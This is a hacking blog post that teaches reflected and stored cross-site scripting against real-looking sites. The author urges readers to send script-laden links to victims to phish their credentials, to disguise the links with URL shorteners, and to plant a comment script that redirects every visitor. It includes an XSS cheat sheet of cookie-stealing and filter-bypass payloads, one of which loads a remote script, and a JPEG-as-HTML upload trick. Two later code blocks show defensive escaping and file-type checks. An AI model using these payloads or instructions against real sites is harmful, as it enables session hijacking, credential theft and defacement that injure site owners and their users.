XSS-CSS script attack

Hi guys, today I got a success: I hacked a site using only an XSS/CSS attack. I feel very happy and want to share the idea with others too.

What is an XSS script? How does it work?

If you want to know this, then go through this.

Xss Script attack

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications, such as web browsers through breaches of browser security, that enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same origin policy. Cross-site scripting carried out on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Their effect may range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner.


Xss Script Attack Client Side

XSS is one of the major vulnerabilities in web applications. It's an injection-type attack: we inject some malicious script into the web application using any input box. You can put the script in a search box, login form, comment option, contact-us form, etc. Wherever you can give any input data, try the scripts there; if the script is accepted, then you can do anything using this XSS/CSS script.

Client-side attack means it only affects the client side. That is, when we send the link to the victim and he/she opens the page, our script executes there: we can steal his/her cookies, session IDs and tokens, and we can get the credentials if they enter their username and password in our scripted page. This is a client-side attack.

Yeah, now I'm going to teach you from the basics.

That means let's first start with the URL script attack. I'm going to use an example site, not the original site that I hacked. So first find an XSS/CSS script vulnerable site and do the experiments below. Don't worry, Google is there; search for XSS vulnerable sites. Read the steps below properly and you can definitely hack a site.

Example site : http://www.mobilestores.com

One day I just opened the site to look at some new model mobiles to purchase. I searched for five minutes, and at that time I noticed the URL. The URL looked like this:

http://www.mobilestores.com/search.php?mobileid=g123

Again, when I searched for the next model it changed to:

http://www.mobilestores.com/search.php?mobileid=sony231

I'm a very lazy person, so what I thought was: instead of going to several pages and searching for the models, why don't I put the model number in the URL? So I put my favourite model, "Sony Xperia", in the URL:

http://www.mobilestores.com/search.php?mobileid=Sony Xperia

Actually I entered the model wrongly, but I saw that the words "Sony Xperia" were reflected on the page. So then I thought: why is it showing like this? If the item isn't there, why doesn't it show "item not found"?

It means that it takes the input from the URL. So I planned to change the words "Sony Xperia" in the URL and put "I Hacked this site" instead:

http://www.mobilestores.com/search.php?mobileid=I Hacked this site

Oh my god, it displayed on the site: "I Hacked this site". Now my mind started working a little faster. I wanted to do something more. I went to Google and searched for some XSS scripts (CSS scripts). I got some scripts; I'm putting some basic ones here for you:

<script>alert('I Wanna Hack You')</script>
<script>msgbox('You Are Hacked')</script>

I just replaced the words "Sony Xperia" in the URL and put my script there:

http://www.mobilestores.com/search.php?mobileid=<script>alert('I Wanna Hack You')</script>

Awesome work by me. When I open this URL it shows an alert box saying "I Wanna Hack You".


Similarly, try a script that asks for a username and password, put it in the URL and send it to other users. They will definitely enter their username and password, and you can then use their credentials. But remember one thing: don't send the whole URL, because it will show that a script is added in the URL. Don't worry about it; just search Google for a URL shortener, make your URL short and send it.

There are lots of XSS/CSS script attack codes on Google. Search and find more codes.

I hope you people understand. It's just the very basics. If you have any doubt, then mail me or put a comment. If you succeed, then go on to the server-side XSS/CSS script attack below.

XSS server side attack.

A server-side attack is quite harmful and very effective, because if you inject a script into the server, that page is displayed to all the people who view it. So you can get the login credentials of a lot of people, especially if you do that on an online shopping site; then think what will happen. Within an hour you can get more than 500 people's passwords, bank accounts, PIN numbers etc. You can get a hell of a lot of information.

Now think how you will inject the XSS/CSS script into the server side. I tried a lot in the URL, search box, username box and password box, but nothing worked. I really got very bored. What a fu…ng job it is. Days passed; I referred to a lot of books and sites. One day I remembered that there are some more options for input on a web page, so why don't I try those? That is, the comment option, or the contact-us form on the page. I tried to inject the CSS/XSS script into a lot of sites, but I succeeded on one site:

http://www.hackerstest.com


I did it. I was very crazy on that day. After a long time I hacked another site. I just went to the comment option and filled in the form:

name : anonymous
email : aaaa@gmail.com
Comment : <script>document.location='http://www.redtube.com'</script>

Now say what will happen when I click the submit button. When somebody tries to open the site, it goes to redtube.com. The people get crazy, and I think they might even enjoy this.

Anyway, thanks a lot buddies for reading it up to the end, and if anybody wants XSS script attack vulnerable sites, comment below or catch me on indianhackingstuff@gmail.com

Best wishes, Hack on your own way.

Example For XSS Script To Steal The Session Id :

The attacker can compromise the session token by using malicious code or programs running at the client-side. The example shows how the attacker could use an XSS attack to steal the session token. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker. The example in figure 3 uses an XSS attack to show the cookie value of the current session; using the same technique it’s possible to create a specific JavaScript code that will send the cookie to the attacker.

<SCRIPT>alert(document.cookie);</SCRIPT>


I've put some scripts below; you can try these too.

XSS Cheat Sheet

The ol'e basic:

"><script >alert(document.cookie)</script>

Bypass filter when it strips <script> tags:

%253cscript%253ealert(document.cookie)%253c/script%253e

"><s"%2b"cript>alert(document.cookie)</script>

"><ScRiPt>alert(document.cookie)</script>

"><<script>alert(document.cookie);//<</script>

foo%00<script>alert(document.cookie)</script>

<scr<script>ipt>alert(document.cookie)</scr</script>ipt>

%22/%3E%3CBODY%20onload='document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E

When inside <script> tags:

'; alert(document.cookie); var foo='

foo\'; alert(document.cookie);//';

</script><script >alert(document.cookie)</script>

Other XSS that don’t require <script>:

<img src=asdf onerror=alert(document.cookie)>

<BODY ONLOAD=alert('XSS')>
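The reflected search.php case above, the stored comment case and the "bypass filter when it strips <script> tags" group all come down to the same defensive point, so here is one added Node.js example (not code from the original post) that runs the page's own payloads through a naive tag-stripping filter and through HTML escaping and reports which one still leaves executable markup. The search page template and the `containsActiveMarkup` check are assumptions made for the example.

```javascript
// Added example (not code from the original post): a naive "strip <script>"
// filter versus HTML escaping, run over payloads quoted on this page.

// What many ad hoc filters do: delete the literal, lower-case <script> tags.
function naiveStripScript(input) {
  return input.replace(/<\/?script>/g, '');
}

// What actually neutralises untrusted text in HTML body context: encode every
// character that could open a tag, close an attribute or start an entity.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Assumed template for the post's search.php: the mobileid parameter is pasted
// straight into the page, which is the reflected XSS the post describes.
function renderSearchVulnerable(mobileid) {
  return `<p>Results for: ${mobileid}</p>`;
}

// Same page after the fix: the parameter is escaped before it reaches the HTML.
function renderSearchFixed(mobileid) {
  return `<p>Results for: ${escapeHtml(mobileid)}</p>`;
}

// True if the HTML still contains a script/img/body element or any tag that
// carries an on* event handler, i.e. something a browser would execute.
function containsActiveMarkup(html) {
  return /<(script|img|body)\b|<[a-z][^>]*\son\w+\s*=/i.test(html);
}

// Inputs for the comparison, taken from the post and its cheat sheet.
const PAYLOADS = [
  "<script>alert('I Wanna Hack You')</script>",
  '<scr<script>ipt>alert(document.cookie)</scr</script>ipt>',
  '"><ScRiPt>alert(document.cookie)</script>',
  '<img src=asdf onerror=alert(document.cookie)>',
];

// For each payload: does executable markup survive the filter? the escaping?
function compareDefences() {
  return PAYLOADS.map((p) => ({
    payload: p,
    stripLeaks: containsActiveMarkup(renderSearchVulnerable(naiveStripScript(p))),
    escapeLeaks: containsActiveMarkup(renderSearchFixed(p)),
  }));
}
```

Only the plain lower-case `<script>` payload is caught by the filter; the nested, mixed-case and `<img onerror>` payloads all survive it, while escaping neutralises all four.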

On IE, many tags will accept a style attribute that one could do things with:

http://www.site.com?image=s%22%20style=x:expression(alert(document.cookie))

http://www.site.com?image=s%22%20style=%22background:url(javascript:alert('XSS'))

http://www.site.com?image=s%22%20%22+STYLE%3D%22background-image%3A+expression%28alert%28%27XSS%3F%29%29

In Firefox, if you control the content attribute of a refresh meta tag, you can inject a URL that uses the javascript: protocol:

http://www.site.com?catCode=%22/%3E%3Cmeta%20http-equiv=refresh%20content=0;javascript:alert(document.cookie);>

XSS in JPEGs:

Don't forget that if a user requests a JPEG file in IE directly (not through an embedded <img> tag), then IE will process the contents as HTML if that is what the JPEG contains. This means that we can upload a file with a .jpg extension containing an XSS payload. This works nicely when we have an application that has functionality to upload images which then get viewed by others. This is common in web mail applications, where one can send an email containing an image attachment, etc. Many applications sanitize HTML attachments to block XSS attacks, but overlook the way IE handles JPEG files.

Example:

HTTP/1.1 200 OK
Date: Sun, 6 May 2007 11:32:35 GMT
Server: Apache
Content-Length: 39
Content-Type: image/jpeg

<script>alert(document.cookie)</script>
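As an added example (not from the original post), here is a Node.js check that catches the response above on the server side: it refuses an "image/jpeg" body that does not start with the JPEG SOI marker and builds response headers that stop IE-style content sniffing. The response parser and the header set are the example's own assumptions; the sample response is the one quoted above, constructed with CRLF line endings.

```javascript
// Added example (not code from the original post): validate that data declared
// as image/jpeg really is a JPEG, and serve uploads with anti-sniffing headers.

// Every JPEG begins with the SOI marker FF D8 followed by an FF marker byte.
const JPEG_MAGIC = Buffer.from([0xff, 0xd8, 0xff]);

function looksLikeJpeg(bytes) {
  return bytes.length >= 3 && bytes.subarray(0, 3).equals(JPEG_MAGIC);
}

// Minimal parser for a raw HTTP/1.1 response (CRLF separated) into a map of
// lower-cased header names and the body as bytes.
function parseResponse(raw) {
  const sep = raw.indexOf('\r\n\r\n');
  const headLines = raw.slice(0, sep).split('\r\n');
  const headers = {};
  for (const line of headLines.slice(1)) {
    const i = line.indexOf(':');
    headers[line.slice(0, i).trim().toLowerCase()] = line.slice(i + 1).trim();
  }
  return { headers, body: Buffer.from(raw.slice(sep + 4), 'latin1') };
}

// True when the declared type is image/jpeg but the bytes are not a JPEG; this
// is exactly the "HTML inside a .jpg" case IE would render as a page.
function isTypeMismatch(raw) {
  const { headers, body } = parseResponse(raw);
  return headers['content-type'] === 'image/jpeg' && !looksLikeJpeg(body);
}

// Headers for serving user uploads: the type is pinned, browsers are told not
// to sniff, and the file is offered as a download rather than rendered inline.
function uploadResponseHeaders(contentType) {
  return {
    'Content-Type': contentType,
    'X-Content-Type-Options': 'nosniff',
    'Content-Disposition': 'attachment',
  };
}

// Constructed sample: the response quoted in the post, with CRLF line endings.
const SAMPLE = [
  'HTTP/1.1 200 OK', 'Date: Sun, 6 May 2007 11:32:35 GMT', 'Server: Apache',
  'Content-Length: 39', 'Content-Type: image/jpeg', '',
  '<script>alert(document.cookie)</script>',
].join('\r\n');
```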


5 thoughts on "XSS-CSS script attack"

  1. It was a nice Article

    Please send me the PPT if you have one for your last post on the JPEG XSS payload.
    Also provide some more xss scripts for manual validation

